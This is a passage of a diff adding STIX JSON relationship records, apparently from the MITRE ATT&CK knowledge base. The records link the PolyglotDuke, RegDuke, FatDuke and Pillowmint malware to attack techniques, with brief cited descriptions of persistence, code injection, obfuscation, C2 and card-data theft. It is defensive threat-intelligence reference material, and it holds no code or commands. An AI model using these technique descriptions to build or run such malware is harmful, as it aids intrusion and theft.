"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--3d57dcc4-be99-4613-9482-d5218f5ec13e", + "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[PolyglotDuke](https://attack.mitre.org/software/S0518) can custom encrypt strings.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--194d773b-a9b6-43fc-8113-8e120be95c5c", + "type": "relationship", + "modified": "2020-10-09T16:07:59.591Z", + "created": "2020-09-23T16:08:44.321Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--3d57dcc4-be99-4613-9482-d5218f5ec13e", + "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[PolyglotDuke](https://attack.mitre.org/software/S0518) can use a custom algorithm to decrypt strings used by the malware.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--fe2eb5b7-7ae1-4df1-a49e-ad13f50510e8", + "type": "relationship", + "modified": "2020-10-09T16:07:59.616Z", + "created": "2020-09-23T16:08:44.324Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--3d57dcc4-be99-4613-9482-d5218f5ec13e", + "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[PolyglotDuke](https://attack.mitre.org/software/S0518) can write encrypted JSON configuration files to the Registry.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--190057d5-13ad-40d2-a2f0-0177850e2905", + "type": "relationship", + "modified": "2020-10-09T16:07:59.630Z", + "created": "2020-09-23T17:54:32.088Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--3d57dcc4-be99-4613-9482-d5218f5ec13e", + "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[PolyglotDuke](https://attack.mitre.org/software/S0518) can use LoadLibraryW and CreateProcess to load and execute code.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--630d1f21-549f-415a-968c-bd3dc3c6fb7f", + "type": "relationship", + "modified": "2020-10-09T16:07:59.663Z", + "created": "2020-09-23T17:54:32.102Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--3d57dcc4-be99-4613-9482-d5218f5ec13e", + "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[PolyglotDuke](https://attack.mitre.org/software/S0518) can retrieve payloads from the C2 server.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--28d3336f-108b-40fb-b3d7-9ec4311931c4", + "type": "relationship", + "modified": "2020-10-09T16:07:59.677Z", + "created": "2020-09-23T17:54:32.175Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--3d57dcc4-be99-4613-9482-d5218f5ec13e", + "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[PolyglotDuke](https://attack.mitre.org/software/S0518) has has used HTTP GET requests in C2 communications.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--a273ce5e-9ca8-4093-a815-3a3a60a16a97", + "type": "relationship", + "modified": "2020-10-09T16:07:59.692Z", + "created": "2020-09-23T17:54:32.181Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--3d57dcc4-be99-4613-9482-d5218f5ec13e", + "target_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[PolyglotDuke](https://attack.mitre.org/software/S0518) can be executed using rundll32.exe.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--2f25c2ba-ee4b-41e7-9cf9-7a0960f3e77c", + "type": "relationship", + "modified": "2020-10-09T16:07:59.706Z", + "created": "2020-09-23T17:54:32.199Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542", + "target_ref": "malware--47124daf-44be-4530-9c63-038bc64318dd", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--a4eb7719-b7e3-438e-8cb6-ebd576e74bbb", + "type": "relationship", + "modified": "2020-10-09T16:07:59.760Z", + "created": "2020-09-23T18:12:03.811Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--bd7a9e13-69fa-4243-a5e5-04326a63f9f2", + "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "external_references": [ + { + "source_name": "Trustwave Pillowmint June 2020", + "url": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/", + "description": "Trustwave SpiderLabs. (2020, June 22). Pillowmint: FIN7\u2019s Monkey Thief . Retrieved July 27, 2020." + } + ], + "description": "[Pillowmint](https://attack.mitre.org/software/S0517) has deleted the filepath %APPDATA%\\Intel\\devmonsrv.exe.(Citation: Trustwave Pillowmint June 2020)", + "relationship_type": "uses", + "id": "relationship--d0c8b03f-7c57-4156-bc5e-cd0c45327ef3", + "type": "relationship", + "modified": "2020-10-02T17:23:24.565Z", + "created": "2020-09-23T20:30:55.923Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--bd7a9e13-69fa-4243-a5e5-04326a63f9f2", + "target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "external_references": [ + { + "source_name": "Trustwave Pillowmint June 2020", + "url": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/", + "description": "Trustwave SpiderLabs. (2020, June 22). Pillowmint: FIN7\u2019s Monkey Thief . Retrieved July 27, 2020." + } + ], + "description": "[Pillowmint](https://attack.mitre.org/software/S0517) has collected credit card data using native API functions.(Citation: Trustwave Pillowmint June 2020)", + "relationship_type": "uses", + "id": "relationship--bcd496b7-7e6a-483b-b1d4-f7dc935a563d", + "type": "relationship", + "modified": "2020-10-02T17:23:24.563Z", + "created": "2020-09-23T20:30:55.971Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--bd7a9e13-69fa-4243-a5e5-04326a63f9f2", + "target_ref": "attack-pattern--7c0f17c9-1af6-4628-9cbd-9e45482dd605", + "external_references": [ + { + "source_name": "Trustwave Pillowmint June 2020", + "url": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/", + "description": "Trustwave SpiderLabs. (2020, June 22). Pillowmint: FIN7\u2019s Monkey Thief . Retrieved July 27, 2020." + } + ], + "description": "[Pillowmint](https://attack.mitre.org/software/S0517) has used the NtQueueApcThread syscall to inject code into svchost.exe.(Citation: Trustwave Pillowmint June 2020)", + "relationship_type": "uses", + "id": "relationship--2dfd662a-231a-4b4c-b7e6-b61058fc4494", + "type": "relationship", + "modified": "2020-10-06T17:11:59.411Z", + "created": "2020-09-23T20:30:55.978Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--bd7a9e13-69fa-4243-a5e5-04326a63f9f2", + "target_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69", + "external_references": [ + { + "source_name": "Trustwave Pillowmint June 2020", + "url": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/", + "description": "Trustwave SpiderLabs. (2020, June 22). Pillowmint: FIN7\u2019s Monkey Thief . Retrieved July 27, 2020." + } + ], + "description": "[Pillowmint](https://attack.mitre.org/software/S0517) can uninstall the malicious service from an infected machine.(Citation: Trustwave Pillowmint June 2020)", + "relationship_type": "uses", + "id": "relationship--914972f4-aa33-4c7d-afd8-8c16c93ba2cc", + "type": "relationship", + "modified": "2020-10-02T17:23:24.571Z", + "created": "2020-09-23T20:30:55.967Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--bd7a9e13-69fa-4243-a5e5-04326a63f9f2", + "target_ref": "attack-pattern--c32f7008-9fea-41f7-8366-5eb9b74bd896", + "external_references": [ + { + "source_name": "Trustwave Pillowmint June 2020", + "url": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/", + "description": "Trustwave SpiderLabs. (2020, June 22). Pillowmint: FIN7\u2019s Monkey Thief . Retrieved July 27, 2020." + } + ], + "description": "[Pillowmint](https://attack.mitre.org/software/S0517) has used shellcode which reads code stored in the registry keys \\REGISTRY\\SOFTWARE\\Microsoft\\DRM using the native Windows API as well as read HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces as part of its C2.(Citation: Trustwave Pillowmint June 2020)\t", + "relationship_type": "uses", + "id": "relationship--3454bb10-fad3-48b6-b20a-81cb45e7bbc1", + "type": "relationship", + "modified": "2020-10-06T17:25:07.656Z", + "created": "2020-09-23T20:30:55.982Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47124daf-44be-4530-9c63-038bc64318dd", + "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[RegDuke](https://attack.mitre.org/software/S0511) can extract and execute PowerShell scripts from C2 communications.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--851b7548-1ba4-402d-ae31-8336fa3ae47d", + "type": "relationship", + "modified": "2020-10-09T16:07:59.781Z", + "created": "2020-09-24T13:19:42.484Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47124daf-44be-4530-9c63-038bc64318dd", + "target_ref": "attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[RegDuke](https://attack.mitre.org/software/S0511) can hide data in images, including use of the Least Significant Bit (LSB).(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--44d62933-848e-481e-84f9-7dbdec9a4b85", + "type": "relationship", + "modified": "2020-10-09T16:07:59.803Z", + "created": "2020-09-24T13:19:42.545Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47124daf-44be-4530-9c63-038bc64318dd", + "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[RegDuke](https://attack.mitre.org/software/S0511) can download files from C2.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--342b69ad-118b-467d-838e-33ffa931af29", + "type": "relationship", + "modified": "2020-10-09T16:07:59.884Z", + "created": "2020-09-24T13:19:42.606Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47124daf-44be-4530-9c63-038bc64318dd", + "target_ref": "attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[RegDuke](https://attack.mitre.org/software/S0511) can use Dropbox as its C2 server.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--a7e27068-7c65-45a0-968e-4871720f3348", + "type": "relationship", + "modified": "2020-10-09T16:07:59.901Z", + "created": "2020-09-24T13:19:42.643Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47124daf-44be-4530-9c63-038bc64318dd", + "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[RegDuke](https://attack.mitre.org/software/S0511) can decrypt strings with a key either stored in the Registry or hardcoded in the code.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--8ea64034-60a6-466d-9434-19d05180626c", + "type": "relationship", + "modified": "2020-10-09T16:07:59.938Z", + "created": "2020-09-24T13:19:42.657Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47124daf-44be-4530-9c63-038bc64318dd", + "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[RegDuke](https://attack.mitre.org/software/S0511) can store its encryption key in the Registry.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--9d9b0e66-5b9d-4711-8e5a-23e2807ce7ef", + "type": "relationship", + "modified": "2020-10-09T16:07:59.954Z", + "created": "2020-09-24T13:19:42.696Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47124daf-44be-4530-9c63-038bc64318dd", + "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[RegDuke](https://attack.mitre.org/software/S0511) can use control-flow flattening or the commercially available .NET Reactor for obfuscation.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--c1b912a1-ffb4-4b33-88ec-6a567a1fcfd4", + "type": "relationship", + "modified": "2020-10-09T16:08:00.025Z", + "created": "2020-09-24T13:19:42.708Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47124daf-44be-4530-9c63-038bc64318dd", + "target_ref": "attack-pattern--910906dd-8c0a-475a-9cc1-5e029e2fad58", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[RegDuke](https://attack.mitre.org/software/S0511) can persist using a WMI consumer that is launched every time a process named WINWORD.EXE is started.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--604045bc-5d44-495f-a0cb-df73bd769d90", + "type": "relationship", + "modified": "2020-10-09T16:08:00.033Z", + "created": "2020-09-24T13:19:42.749Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--54a01db0-9fab-4d5f-8209-53cef8425f4a", + "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[FatDuke](https://attack.mitre.org/software/S0512) can call ShellExecuteW to open the default browser on the URL localhost.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--67c21ae7-5dc3-4439-b5d1-df937abac3ad", + "type": "relationship", + "modified": "2020-10-09T16:08:00.097Z", + "created": "2020-09-24T14:20:39.197Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--54a01db0-9fab-4d5f-8209-53cef8425f4a", + "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[FatDuke](https://attack.mitre.org/software/S0512) has attempted to mimic a compromised user's traffic by using the same user agent as the installed browser.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--10d0c930-1470-4d2e-aff8-0bf42c42d2f0", + "type": "relationship", + "modified": "2020-10-09T16:08:00.151Z", + "created": "2020-09-24T14:20:39.211Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--54a01db0-9fab-4d5f-8209-53cef8425f4a", + "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[FatDuke](https://attack.mitre.org/software/S0512) can be controlled via a custom C2 protocol over HTTP.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--277c6e7e-8c39-4c41-ac6f-f740bfb862b8", + "type": "relationship", + "modified": "2020-10-09T16:08:00.184Z", + "created": "2020-09-24T14:20:39.219Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--54a01db0-9fab-4d5f-8209-53cef8425f4a", + "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[FatDuke](https://attack.mitre.org/software/S0512) can use base64 encoding, string stacking, and opaque predicates for obfuscation.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--7b17bab3-6c5a-4db2-969b-7724f71afc09", + "type": "relationship", + "modified": "2020-10-09T16:08:00.231Z", + "created": "2020-09-24T14:20:39.241Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--54a01db0-9fab-4d5f-8209-53cef8425f4a", + "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[FatDuke](https://attack.mitre.org/software/S0512) can decrypt AES encrypted C2 communications.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--fbe5352c-7c4f-437c-a439-d212ba6d439b", + "type": "relationship", + "modified": "2020-10-09T16:08:00.250Z", + "created": "2020-09-24T14:20:39.245Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--54a01db0-9fab-4d5f-8209-53cef8425f4a", + "target_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[FatDuke](https://attack.mitre.org/software/S0512) can AES encrypt C2 communications.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--d6a29b67-d323-4579-9c8e-1c95a0ea7c20", + "type": "relationship", + "modified": "2020-10-09T16:08:00.302Z", + "created": "2020-09-24T14:20:39.249Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--54a01db0-9fab-4d5f-8209-53cef8425f4a", + "target_ref": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[FatDuke](https://attack.mitre.org/software/S0512) has been regularly repacked by its operators to create large binaries and evade detection.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--6af4810f-3abe-43eb-92b0-ee8fefc2a4b9", + "type": "relationship", + "modified": "2020-10-09T16:08:00.307Z", + "created": "2020-09-24T14:20:39.251Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--54a01db0-9fab-4d5f-8209-53cef8425f4a", + "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[FatDuke](https://attack.mitre.org/software/S0512) can collect the user name, Windows version, computer name, and available space on discs from a compromised host.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--4f5fd1ed-a91e-4a9e-b2e8-6c45cc31e065", + "type": "relationship", + "modified": "2020-10-09T16:08:00.339Z", + "created": "2020-09-24T14:20:39.243Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--54a01db0-9fab-4d5f-8209-53cef8425f4a", + "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279", + "external_references": [ + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "description": "[FatDuke](https://attack.mitre.org/software/S0512) has used HKLM\\SOFTWARE\\Microsoft\\CurrentVersion\\Run to establish persistence.(Citation: ESET Dukes October 2019)", + "relationship_type": "uses", + "id": "relationship--603725ac-1b50-482d-b3f5-f657fdd082af", + "type": "relationship", + "modified": "2020-10-09T16:08:00.348Z", + "created": "2020-09-24T14:20:39.254Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--54a01db0-9fab-4d5f-8209-53cef8425f4a", + "target_ref": 